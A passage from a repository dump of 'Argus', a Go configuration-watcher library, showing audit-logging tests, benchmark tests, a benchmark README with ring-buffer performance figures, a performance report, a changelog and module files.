		t.Errorf("Failed to close tmpFile: %v", err)
	}

	// Create temporary audit file
	auditFile, err := os.CreateTemp("", "audit-*.jsonl")
	if err != nil {
		t.Fatal(err)
	}
	defer func() {
		if err := os.Remove(auditFile.Name()); err != nil {
			t.Errorf("Failed to remove auditFile: %v", err)
		}
	}()
	if err := auditFile.Close(); err != nil {
		t.Errorf("Failed to close auditFile: %v", err)
	}

	// Create watcher with audit
	config := Config{
		Audit: AuditConfig{
			Enabled:       true,
			OutputFile:    auditFile.Name(),
			MinLevel:      AuditInfo,
			BufferSize:    10,
			FlushInterval: 100 * time.Millisecond,
			IncludeStack:  false,
		},
	}

	// Set up config watching
	changeDetected := make(chan bool, 1)
	watcher, err := UniversalConfigWatcherWithConfig(tmpFile.Name(), func(config map[string]interface{}) {
		t.Logf("Config changed: %+v", config)
		select {
		case changeDetected <- true:
		default:
		}
	}, config)
	if err != nil {
		t.Fatal(err)
	}

	// Wait a bit for initial setup
	time.Sleep(100 * time.Millisecond)

	// Modify config file
	updatedConfig := `{"log_level": "debug", "port": 9090}`
	if err := os.WriteFile(tmpFile.Name(), []byte(updatedConfig), 0644); err != nil {
		t.Fatal(err)
	}

	// Wait for change detection
	select {
	case <-changeDetected:
		t.Log("✅ Config change detected")
	case <-time.After(2 * time.Second):
		t.Fatal("Timeout waiting for config change")
	}

	// Stop watcher and flush audit
	if err := watcher.Stop(); err != nil {
		t.Errorf("Failed to stop watcher: %v", err)
	}
	if watcher.auditLogger != nil {
		if err := watcher.auditLogger.Flush(); err != nil {
			t.Errorf("Failed to flush auditLogger: %v", err)
		}
		time.Sleep(200 * time.Millisecond)
	}

	// Check audit output
	auditData, err := os.ReadFile(auditFile.Name())
	if err != nil {
		t.Fatal(err)
	}

	auditOutput := string(auditData)
	if auditOutput == "" {
		t.Error("Expected audit output for config changes")
	} else {
		t.Logf("✅ Audit trail captured:\n%s", auditOutput)
	}
}

func TestAuditLoggerTamperDetection(t *testing.T) {
	// Create temporary audit file
	tmpFile, err := os.CreateTemp("", "audit-tamper-*.jsonl")
	if err != nil {
		t.Fatal(err)
	}
	defer func() {
		if err := os.Remove(tmpFile.Name()); err != nil {
			t.Errorf("Failed to remove tmpFile: %v", err)
		}
	}()
	if err := tmpFile.Close(); err != nil {
		t.Errorf("Failed to close tmpFile: %v", err)
	}

	config := AuditConfig{
		Enabled:       true,
		OutputFile:    tmpFile.Name(),
		MinLevel:      AuditInfo,
		BufferSize:    5,
		FlushInterval: 50 * time.Millisecond,
		IncludeStack:  false,
	}

	auditor, err := NewAuditLogger(config)
	if err != nil {
		t.Fatal(err)
	}

	// Log some events
	auditor.LogFileWatch("test1", "/path1")
	auditor.LogFileWatch("test2", "/path2")
	auditor.LogConfigChange("/config", nil, map[string]interface{}{"key": "value"})

	if err := auditor.Flush(); err != nil {
		t.Errorf("Failed to flush auditor: %v", err)
	}
	if err := auditor.Close(); err != nil {
		t.Errorf("Failed to close auditor: %v", err)
	}

	// Read and verify audit entries
	auditData, err := os.ReadFile(tmpFile.Name())
	if err != nil {
		t.Fatal(err)
	}

	if len(auditData) == 0 {
		t.Error("Expected audit entries with checksums")
		return
	}

	t.Logf("✅ Generated audit entries with tamper detection")
	t.Logf("Audit content: %s", string(auditData))
}

func TestAuditLevel_String(t *testing.T) {
	tests := []struct {
		level    AuditLevel
		expected string
	}{
		{AuditInfo, "INFO"},
		{AuditWarn, "WARN"},
		{AuditCritical, "CRITICAL"},
		{AuditSecurity, "SECURITY"},
		{AuditLevel(999), "UNKNOWN"}, // Test invalid level
	}

	for _, test := range tests {
		if got := test.level.String(); got != test.expected {
			t.Errorf("AuditLevel(%d).String() = %q, want %q", test.level, got, test.expected)
		}
	}
}

```

## /benchmark_test.go

```go path="/benchmark_test.go" 
// benchmark_test.go - Argus Benchmark Tests
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"fmt"
	"os"
	"path/filepath"
	"testing"
	"time"
)

// Benchmark for the hyper-optimized DetectFormat function
func BenchmarkDetectFormatOptimized(b *testing.B) {
	testFiles := []string{
		"config.json",            // Common case
		"app.yml",                // 3-char extension
		"docker-compose.yaml",    // 4-char extension
		"Cargo.toml",             // Different format
		"terraform.hcl",          // HCL format
		"main.tf",                // Short HCL
		"app.ini",                // INI format
		"system.conf",            // CONF format
		"server.cfg",             // CFG format
		"application.properties", // Long extension
		"service.config",         // CONFIG format
	}

	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		for _, file := range testFiles {
			DetectFormat(file)
		}
	}
}

// Benchmark single file format detection (most common case)
func BenchmarkDetectFormatSingleOptimized(b *testing.B) {
	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		DetectFormat("config.json") // Most common case
	}
}

// Benchmark ParseConfig without custom parsers (built-in only) - OPTIMIZED
func BenchmarkParseConfigBuiltinOnlyOptimized(b *testing.B) {
	// Test different JSON sizes to verify scalability
	testCases := []struct {
		name string
		data []byte
	}{
		{"small", []byte(`{"service": "test", "port": 8080, "enabled": true}`)},
		{"medium", []byte(`{"service": "test", "port": 8080, "enabled": true, "database": {"host": "localhost", "port": 5432, "name": "testdb"}, "features": ["auth", "logging", "metrics"]}`)},
		{"large", []byte(`{"service": "test", "port": 8080, "enabled": true, "database": {"host": "localhost", "port": 5432, "name": "testdb", "pool": {"min": 5, "max": 100}}, "features": ["auth", "logging", "metrics", "tracing"], "config": {"timeout": 30, "retries": 3, "backoff": 1.5}, "servers": [{"name": "server1", "host": "10.0.0.1"}, {"name": "server2", "host": "10.0.0.2"}]}`)},
	}

	// Ensure no custom parsers are registered
	parserMutex.Lock()
	originalParsers := customParsers
	customParsers = nil
	parserMutex.Unlock()
	defer func() {
		parserMutex.Lock()
		customParsers = originalParsers
		parserMutex.Unlock()
	}()

	for _, tc := range testCases {
		b.Run(tc.name, func(b *testing.B) {
			b.ResetTimer()
			for i := 0; i < b.N; i++ {
				_, err := ParseConfig(tc.data, FormatJSON)
				if err != nil {
					b.Fatal(err)
				}
			}
		})
	}
}

// Benchmark ParseConfig with custom parser registered (but not used)
func BenchmarkParseConfigWithCustomParser(b *testing.B) {
	jsonContent := []byte(`{"service": "test", "port": 8080, "enabled": true}`)

	// Save original state
	parserMutex.Lock()
	originalParsers := make([]ConfigParser, len(customParsers))
	copy(originalParsers, customParsers)
	customParsers = nil
	parserMutex.Unlock()
	defer func() {
		parserMutex.Lock()
		customParsers = originalParsers
		parserMutex.Unlock()
	}()

	// Register a custom YAML parser (won't be used for JSON)
	testParser := &testParserForBenchmark{}
	RegisterParser(testParser)

	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		_, err := ParseConfig(jsonContent, FormatJSON)
		if err != nil {
			b.Fatal(err)
		}
	}
}

// Benchmark ParseConfig with custom parser being used
func BenchmarkParseConfigCustomParserUsed(b *testing.B) {
	yamlContent := []byte(`service: test
port: 8080
enabled: true`)

	// Save original state
	parserMutex.Lock()
	originalParsers := make([]ConfigParser, len(customParsers))
	copy(originalParsers, customParsers)
	customParsers = nil
	parserMutex.Unlock()
	defer func() {
		parserMutex.Lock()
		customParsers = originalParsers
		parserMutex.Unlock()
	}()

	// Register a custom YAML parser
	testParser := &testParserForBenchmark{}
	RegisterParser(testParser)

	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		_, err := ParseConfig(yamlContent, FormatYAML)
		if err != nil {
			b.Fatal(err)
		}
	}
}

// Benchmark parser registration (thread safety overhead)
func BenchmarkParserRegistration(b *testing.B) {
	// Save original state
	parserMutex.Lock()
	originalParsers := make([]ConfigParser, len(customParsers))
	copy(originalParsers, customParsers)
	parserMutex.Unlock()
	defer func() {
		parserMutex.Lock()
		customParsers = originalParsers
		parserMutex.Unlock()
	}()

	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		// Clear and re-register to test registration performance
		parserMutex.Lock()
		customParsers = nil
		parserMutex.Unlock()

		RegisterParser(&testParserForBenchmark{})
	}
}

// Benchmark core Watcher operations (moved from other files for consolidation)
func BenchmarkWatcherGetStatOptimized(b *testing.B) {
	tmpFile, err := os.CreateTemp("", "argus_bench_")
	if err != nil {
		b.Fatalf("Failed to create temp file: %v", err)
	}
	defer func() {
		if err := os.Remove(tmpFile.Name()); err != nil {
			b.Errorf("Failed to remove tmpFile: %v", err)
		}
	}()
	if err := tmpFile.Close(); err != nil {
		b.Errorf("Failed to close tmpFile: %v", err)
	}

	watcher := New(Config{CacheTTL: time.Hour}) // Long TTL for cache hit testing
	if err := watcher.Start(); err != nil {
		b.Fatalf("Failed to start watcher: %v", err)
	}
	defer func() {
		if err := watcher.Stop(); err != nil {
			b.Errorf("Failed to stop watcher: %v", err)
		}
	}()

	// Prime the cache
	if _, err := watcher.getStat(tmpFile.Name()); err != nil {
		b.Logf("Failed to get stat: %v", err)
	}

	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		if _, err := watcher.getStat(tmpFile.Name()); err != nil {
			b.Logf("Failed to get stat: %v", err)
		} // Should be cache hit
	}
}

// Benchmark cache miss performance
func BenchmarkWatcherGetStatCacheMiss(b *testing.B) {
	tmpFile, err := os.CreateTemp("", "argus_bench_")
	if err != nil {
		b.Fatalf("Failed to create temp file: %v", err)
	}
	defer func() {
		if err := os.Remove(tmpFile.Name()); err != nil {
			b.Errorf("Failed to remove tmpFile: %v", err)
		}
	}()
	if err := tmpFile.Close(); err != nil {
		b.Errorf("Failed to close tmpFile: %v", err)
	}

	watcher := New(Config{CacheTTL: 0}) // No caching - always miss
	if err := watcher.Start(); err != nil {
		b.Fatalf("Failed to start watcher: %v", err)
	}
	defer func() {
		if err := watcher.Stop(); err != nil {
			b.Errorf("Failed to stop watcher: %v", err)
		}
	}()

	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		if _, err := watcher.getStat(tmpFile.Name()); err != nil {
			b.Logf("Failed to get stat: %v", err)
		} // Always cache miss
	}
}

func BenchmarkWatcherPollFiles(b *testing.B) {
	tmpDir, err := os.MkdirTemp("", "argus_bench_")
	if err != nil {
		b.Fatalf("Failed to create temp dir: %v", err)
	}
	defer func() {
		if err := os.RemoveAll(tmpDir); err != nil {
			b.Errorf("Failed to remove tmpDir: %v", err)
		}
	}()

	// Create test files
	for i := 0; i < 5; i++ {
		testFile := filepath.Join(tmpDir, fmt.Sprintf("test%d.json", i))
		if err := os.WriteFile(testFile, []byte(`{"test": true}`), 0644); err != nil {
			b.Fatalf("Failed to create test file: %v", err)
		}
	}

	watcher := New(Config{PollInterval: time.Millisecond})
	if err := watcher.Start(); err != nil {
		b.Fatalf("Failed to start watcher: %v", err)
	}
	defer func() {
		if err := watcher.Stop(); err != nil {
			b.Errorf("Failed to stop watcher: %v", err)
		}
	}()

	// Add some files to watch
	files, _ := os.ReadDir(tmpDir)
	for _, file := range files {
		if !file.IsDir() {
			if err := watcher.Watch(tmpDir+"/"+file.Name(), func(event ChangeEvent) {}); err != nil {
				b.Logf("Failed to watch file: %v", err)
			}
		}
	}

	b.ResetTimer()
	for i := 0; i < b.N; i++ {
		watcher.pollFiles()
	}
}

// Test parser for benchmarks
type testParserForBenchmark struct{}

func (p *testParserForBenchmark) Parse(data []byte) (map[string]interface{}, error) {
	// Simple fast parser for benchmarking
	return map[string]interface{}{
		"benchmark": "test",
		"data_size": len(data),
	}, nil
}

func (p *testParserForBenchmark) Supports(format ConfigFormat) bool {
	return format == FormatYAML
}

func (p *testParserForBenchmark) Name() string {
	return "Benchmark Test Parser"
}

```

## /benchmarks/README.md

# Argus Ring Buffer Performance Benchmarks

This directory contains isolated performance benchmarks for the BoreasLite ring buffer implementation used in Argus. The benchmarks are separated from the main test suite to provide accurate performance measurements without interference from intensive unit tests.

## Benchmark Results

All benchmarks were executed on AMD Ryzen 5 7520U.

### Single Event Processing (Optimized Path)
```
BenchmarkBoreasLite_SingleEvent-8    47011258    25.63 ns/op    39.02 Mops/sec    0 B/op    0 allocs/op
```
- **Latency**: 25.63 nanoseconds per operation
- **Throughput**: 39.02 million operations per second
- **Memory**: Zero allocations in hot path

### Write Operations
```
BenchmarkBoreasLite_WriteFileEvent-8    67764067    53.20 ns/op    18.80 Mops/sec    0 B/op    0 allocs/op
```
- **Latency**: 53.20 nanoseconds per operation
- **Throughput**: 18.80 million operations per second
- **Memory**: Zero allocations

### Multi-Producer Single Consumer (MPSC)
```
BenchmarkBoreasLite_MPSC-8    31231618    34.77 ns/op    28.76 Mops/sec    0 B/op    0 allocs/op
```
- **Latency**: 34.77 nanoseconds per operation under concurrent load
- **Throughput**: 28.76 million operations per second
- **Scalability**: Performance maintained across multiple producers

### Comparison with Go Channels

#### BoreasLite
```
BenchmarkBoreasLite_vsChannels/BoreasLite-8    23317405    45.72 ns/op    21.87 Mops/sec    0 B/op    0 allocs/op
```

#### Go Channels
```
BenchmarkBoreasLite_vsChannels/GoChannels-8    18621222    61.43 ns/op    16.28 Mops/sec    0 B/op    0 allocs/op
```

#### Performance Delta
- **BoreasLite**: 21.87 million ops/sec
- **Go Channels**: 16.28 million ops/sec
- **Improvement**: 34.4% faster than native Go channels

### High Throughput Sustained Load
```
BenchmarkBoreasLite_HighThroughput-8    27012850    53.88 ns/op    18.56 Mops/sec    0 B/op    0 allocs/op
```
- **Sustained throughput**: 18.56 million operations per second
- **Buffer size**: 8192 events
- **Strategy**: Large batch optimization

## Technical Implementation

### Ring Buffer Architecture
- **Type**: Multiple Producer Single Consumer (MPSC)
- **Synchronization**: Lock-free atomic operations
- **Memory Layout**: Cache-line aligned, power-of-2 sizing
- **Event Size**: 128 bytes (2 cache lines)

### Optimization Strategies
1. **SingleEvent**: Ultra-low latency for 1-2 files (25ns)
2. **SmallBatch**: Balanced performance for 3-20 files
3. **LargeBatch**: High throughput for 20+ files with 4x unrolling

### Memory Characteristics
- **Zero allocations** in all hot paths
- **Fixed memory footprint**: 8KB + (128 bytes × buffer_size)
- **Cache efficiency**: Power-of-2 ring buffer with atomic sequence numbers
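The claim-then-publish pattern behind such an MPSC ring can be sketched in a few lines: one atomic add hands each producer a unique sequence number, a power-of-2 mask maps it to a slot, and an atomic store publishes the slot. This is a minimal illustration only, not BoreasLite's actual implementation, which adds batching strategies, wrap-around handling, and consumer backpressure:

```go
package main

import (
	"fmt"
	"sync"
	"sync/atomic"
)

const size = 8 // power of 2, so index = seq & (size-1) replaces a modulo

type slot struct {
	ready atomic.Uint64 // seq+1 once the value is published, 0 while empty
	val   uint64
}

type ring struct {
	next  atomic.Uint64 // next sequence number to claim
	slots [size]slot
}

// publish claims a unique sequence with one atomic add, writes the value,
// then marks the slot ready. With at most `size` events in flight, every
// producer lands in a distinct slot without taking a lock.
func (r *ring) publish(v uint64) {
	seq := r.next.Add(1) - 1
	s := &r.slots[seq&(size-1)]
	s.val = v
	s.ready.Store(seq + 1)
}

func main() {
	var r ring
	var wg sync.WaitGroup
	for i := 0; i < size; i++ { // concurrent producers, one event each
		wg.Add(1)
		go func(v uint64) {
			defer wg.Done()
			r.publish(v)
		}(uint64(i))
	}
	wg.Wait()

	var sum uint64
	for i := range r.slots {
		if r.slots[i].ready.Load() != 0 {
			sum += r.slots[i].val
		}
	}
	fmt.Println(sum) // 0+1+...+7 = 28
}
```

A real single-consumer drain loop would additionally spin or park until `ready` reaches the sequence it expects before reading a slot.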

## Running Benchmarks

Execute all benchmarks:
```bash
go test -bench="BenchmarkBoreasLite.*" -run=^$ -benchmem
```

Execute specific benchmark:
```bash
go test -bench=BenchmarkBoreasLite_SingleEvent -run=^$ -benchmem
```

Execute with multiple iterations:
```bash
go test -bench="BenchmarkBoreasLite.*" -run=^$ -benchmem -count=3
```

## Dependencies

- `github.com/agilira/argus`: Main library (via replace directive)
- `github.com/agilira/go-timecache`: High-performance timestamp caching

## Notes

- Benchmarks use minimal processing functions to isolate ring buffer performance
- All measurements include complete write-to-process cycles where applicable
- MPSC benchmarks use GOMAXPROCS concurrent producers
- Results represent sustainable performance under continuous load

## /benchmarks/go.mod

```mod path="/benchmarks/go.mod" 
module github.com/agilira/argus/benchmarks

go 1.23.11

require (
	github.com/agilira/argus v0.0.0
	github.com/agilira/go-timecache v1.0.2
)

require (
	github.com/agilira/flash-flags v1.1.5 // indirect
	github.com/agilira/go-errors v1.1.0 // indirect
	github.com/mattn/go-sqlite3 v1.14.32 // indirect
)

replace github.com/agilira/argus => ../

replace github.com/agilira/go-timecache => ../../go-timecache

```

## /benchmarks/go.sum

```sum path="/benchmarks/go.sum" 
github.com/agilira/flash-flags v1.1.5 h1:wCYtbmNfqDyDO5J3qE32rRnVLh+8hm0pKNTTmCemR50=
github.com/agilira/flash-flags v1.1.5/go.mod h1:vuuo9FRN+ZgREaa1WYRmUFac/h3+CwuvD4EvjF5JNIQ=
github.com/agilira/go-errors v1.1.0 h1:97cBNEDo6q2pKzkr/YqlqWq3fa5rOU8E4LOnSsCmWck=
github.com/agilira/go-errors v1.1.0/go.mod h1:YEeM2sVXg2w/GmDVZ2m2nH2kJ2Aa34OvbTA6w3JzVbY=
github.com/mattn/go-sqlite3 v1.14.32 h1:JD12Ag3oLy1zQA+BNn74xRgaBbdhbNIDYvQUEuuErjs=
github.com/mattn/go-sqlite3 v1.14.32/go.mod h1:Uh1q+B4BYcTPb+yiD3kU8Ct7aC0hY9fxUwlHK0RXw+Y=

```

## /benchmarks/performance-report-20251016.txt

=== Argus Framework Performance Report ===
Generated: Thu 16 Oct 2025 12:13:49 AM CEST
System: Linux agilira 6.14.0-33-generic #33~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 19 17:02:30 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
Go Version: go version go1.25.1 linux/amd64

=== Benchmark Results ===
=== RUN   TestDummy
--- PASS: TestDummy (0.00s)
goos: linux
goarch: amd64
pkg: github.com/agilira/argus/benchmarks
cpu: AMD Ryzen 5 7520U with Radeon Graphics         
BenchmarkBoreasLite_SingleEvent
BenchmarkBoreasLite_SingleEvent-8      	47891098	        24.82 ns/op	        40.29 Mops/sec	       0 B/op	       0 allocs/op
BenchmarkBoreasLite_WriteFileEvent
BenchmarkBoreasLite_WriteFileEvent-8   	17755099	        69.37 ns/op	        14.42 Mops/sec	       0 B/op	       0 allocs/op
BenchmarkBoreasLite_MPSC
BenchmarkBoreasLite_MPSC-8             	32280844	        34.90 ns/op	        28.66 Mops/sec	       0 B/op	       0 allocs/op
BenchmarkBoreasLite_vsChannels
BenchmarkBoreasLite_vsChannels/BoreasLite
BenchmarkBoreasLite_vsChannels/BoreasLite-8         	20718548	        65.42 ns/op	        15.29 Mops/sec	       0 B/op	       0 allocs/op
BenchmarkBoreasLite_vsChannels/GoChannels
BenchmarkBoreasLite_vsChannels/GoChannels-8         	25734517	        45.12 ns/op	        22.16 Mops/sec	       0 B/op	       0 allocs/op
BenchmarkBoreasLite_HighThroughput
BenchmarkBoreasLite_HighThroughput-8                	21934914	        80.18 ns/op	        12.47 Mops/sec	       0 B/op	       0 allocs/op
PASS
ok  	github.com/agilira/argus/benchmarks	9.005s

=== Consistency Test (3 runs) ===
goos: linux
goarch: amd64
pkg: github.com/agilira/argus/benchmarks
cpu: AMD Ryzen 5 7520U with Radeon Graphics         
BenchmarkBoreasLite_SingleEvent-8   	95769669	        24.72 ns/op	        40.46 Mops/sec	       0 B/op	       0 allocs/op
BenchmarkBoreasLite_SingleEvent-8   	96379674	        25.08 ns/op	        39.87 Mops/sec	       0 B/op	       0 allocs/op
BenchmarkBoreasLite_SingleEvent-8   	97728352	        24.77 ns/op	        40.37 Mops/sec	       0 B/op	       0 allocs/op
PASS
ok  	github.com/agilira/argus/benchmarks	7.298s


## /changelog/v1.0.3.txt

# Changelog - Version 1.0.3

## Release Date
2025-10-15

## Summary
Added an isolated benchmark suite and enhanced security tooling.

## Benchmarks Added
- Isolated benchmark suite in `/benchmarks` directory
- Dedicated go.mod to prevent test interference
- 5 benchmark scenarios covering different workloads
- Performance comparison vs Go channels and callbacks

## Security
- Added `govulncheck` vulnerability scanning
- Integrated `go mod verify` for dependency integrity
- Enhanced CI/CD pipeline with security checks
- Updated both Makefile and Makefile.ps1

## Build Tools
- New Makefile targets: `vulncheck`, `mod-verify`, `status`
- PowerShell equivalents in Makefile.ps1
- Enhanced `check` command with security validation
- Automated tool installation verification

## Infrastructure
- GitHub Actions workflow updated with vulnerability scanning
- Benchmark isolation prevents performance measurement interference
- Cross-platform build script enhancements
- Development tool status checking

## Files Added
- `benchmarks/go.mod`
- `benchmarks/ring_buffer_performance_test.go`
- `changelog/v1.0.3.txt`

## Files Modified
- `Makefile`
- `Makefile.ps1`
- `.github/workflows/ci.yml`

## Breaking Changes
None.

## Compatibility
Full backward compatibility maintained.

## /examples/cli/go.mod

```mod path="/examples/cli/go.mod" 
module github.com/agilira/argus/examples/cli

go 1.25.1

require github.com/agilira/argus v1.0.2

require (
	github.com/agilira/flash-flags v1.1.5 // indirect
	github.com/agilira/go-errors v1.1.0 // indirect
	github.com/agilira/go-timecache v1.0.2 // indirect
	github.com/agilira/orpheus v1.1.10 // indirect
	github.com/mattn/go-sqlite3 v1.14.32 // indirect
)

replace github.com/agilira/argus => ../../

```

## /examples/config_binding/go.mod

```mod path="/examples/config_binding/go.mod" 
module config_binding_example

go 1.23.11

toolchain go1.24.5

replace github.com/agilira/argus => ../..

require github.com/agilira/argus v0.0.0-00010101000000-000000000000

require (
	github.com/agilira/flash-flags v1.1.5 // indirect
	github.com/agilira/go-errors v1.1.0 // indirect
	github.com/agilira/go-timecache v1.0.2 // indirect
	github.com/mattn/go-sqlite3 v1.14.32 // indirect
)

```

